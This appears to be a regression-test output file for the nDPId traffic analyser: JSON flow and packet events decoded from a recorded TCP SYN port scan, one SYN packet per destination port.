+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1649,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsgf0AACsGm3WsEAAIQA2GNIzSAwndUoMYAAAAAGACEAAlhgAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsqw0AADUGaGWsEAAIQA2GNIzSBDLdUoMYAAAAAGACCAAsXQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsFlIAADYG\/CCsEAAIQA2GNIzSNZrdUoMYAAAAAGACDAD29AAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1652,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsq0oAADgGZSisEAAIQA2GNIzSD1DdUoMYAAAAAGACBAAlPwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060904,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1653,"flow_packet_id":1,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060904,"pkt":"ACYLMQczACWzv5HuCABFAAAsxHMAACoGWf+sEAAIQA2GNIzSFxDdUoMYAAAAAGACDAAVfwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060906,"flow_last_seen":1278275060906,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060906,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1654,"flow_packet_id":1,"flow_last_seen":1278275060906,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060906,"pkt":"ACYLMQczACWzv5HuCABFAAAs2HMAACoGRf+sEAAIQA2GNIzSAxPdUoMYAAAAAGACDAApfAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060948,"flow_last_seen":1278275060948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060948,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_packet_id":1,"flow_last_seen":1278275060948,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060948,"pkt":"ACYLMQczACWzv5HuCABFAAAsW74AAC8GvbSsEAAIQA2GNIzTUVzdU4MZAAAAAGACEADXLwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":26214,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1656,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsRtIAACoG16CsEAAIQA2GNIzTZmbdU4MZAAAAAGACDADGJQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAswvIAAC8GVoCsEAAIQA2GNIzTAHfdU4MZAAAAAGACEAAoFQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1658,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAslyQAADQGfU6sEAAIQA2GNIzTA2ndU4MZAAAAAGACBAAxIwAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAs4nsAACsGOvesEAAIQA2GNIzTA4TdU4MZAAAAAGACEAAlCAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1028,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1660,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAswGgAACwGXAqsEAAIQA2GNIzTBATdU4MZAAAAAGACBAAwiAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsjQAAADUGhnKsEAAIQA2GNIzTDnfdU4MZAAAAAGACCAAiFQAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsxBEAACgGXGGsEAAIQA2GNIzTAGTdU4MZAAAAAGACBAA0KAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAst8gAADsGVaqsEAAIQA2GNIzTA4fdU4MZAAAAAGACEAAlBQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1664,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsWzkAACgGxTmsEAAIQA2GNIzTA\/\/dU4MZAAAAAGACBAAwjQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1334,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1665,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAs6kQAADYGKC6sEAAIQA2GNIzTBTbdU4MZAAAAAGACDAAnVgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAszccAADoGQKusEAAIQA2GNIzTE77dU4MZAAAAAGACDAAYzgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":636,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1667,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsHwsAAC8G+mesEAAIQA2GNIzTAnzdU4MZAAAAAGACEAAmEAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1107,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1678,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1668,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAs0XAAACYGUQKsEAAIQA2GNIzTBFPdU4MZAAAAAGACDAAoOQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1679,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1669,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsKaQAACUG+c6sEAAIQA2GNIzSIL\/dUoMYAAAAAGACCAAP0AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1680,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1670,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsRwIAACoG13CsEAAIQA2GNIzSAiDdUoMYAAAAAGACDAAqbwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060949,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1681,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1671,"flow_packet_id":1,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060949,"pkt":"ACYLMQczACWzv5HuCABFAAAsl50AAC8GgdWsEAAIQA2GNIzSI5fdUoMYAAAAAGACEAAE+AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1682,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1672,"flow_packet_id":1,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060951,"pkt":"ACYLMQczACWzv5HuCABFAAAsPJwAACgG49asEAAIQA2GNIzSAbzdUoMYAAAAAGACBAAy0wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1683,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1673,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060951,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3211,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 